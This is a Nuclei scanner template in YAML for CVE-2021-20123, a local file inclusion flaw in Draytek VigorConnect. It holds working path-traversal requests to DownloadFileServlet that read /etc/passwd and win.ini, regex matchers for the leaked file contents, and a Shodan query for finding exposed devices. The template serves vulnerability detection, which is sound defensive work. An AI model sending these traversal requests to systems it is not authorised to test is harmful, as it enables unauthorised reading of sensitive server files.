57 lines
2.2 KiB
YAML
57 lines
2.2 KiB
YAML
id: CVE-2021-20123
|
|
|
|
info:
|
|
name: Draytek VigorConnect 1.6.0-B - Local File Inclusion
|
|
author: 0x_Akoko
|
|
severity: high
|
|
description: |
|
|
Draytek VigorConnect 1.6.0-B3 is susceptible to local file inclusion in the file download functionality of the DownloadFileServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
|
|
remediation: |
|
|
Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Draytek VigorConnect 1.6.0-B.
|
|
reference:
|
|
- https://www.tenable.com/security/research/tra-2021-42
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-20123
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2021-20123
|
|
cwe-id: CWE-22
|
|
epss-score: 0.03116
|
|
epss-percentile: 0.90018
|
|
cpe: cpe:2.3:a:draytek:vigorconnect:1.6.0:beta3:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: draytek
|
|
product: vigorconnect
|
|
shodan-query: http.html:"VigorConnect"
|
|
tags: cve,cve2021,draytek,lfi,vigorconnect,tenable
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything"
|
|
- "{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything"
|
|
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/octet-stream"
|
|
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
- "for 16-bit app support"
|
|
condition: or
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022010c00ee3ef4186a1929d91893f64d8a11f68bea09556f52420180dd676bdf65f022100bb708459b7a014b194de96be7d3b166f2f1b07027b3f8924449bfefec50129ad:922c64590222798bb761d5b6d8e72950 |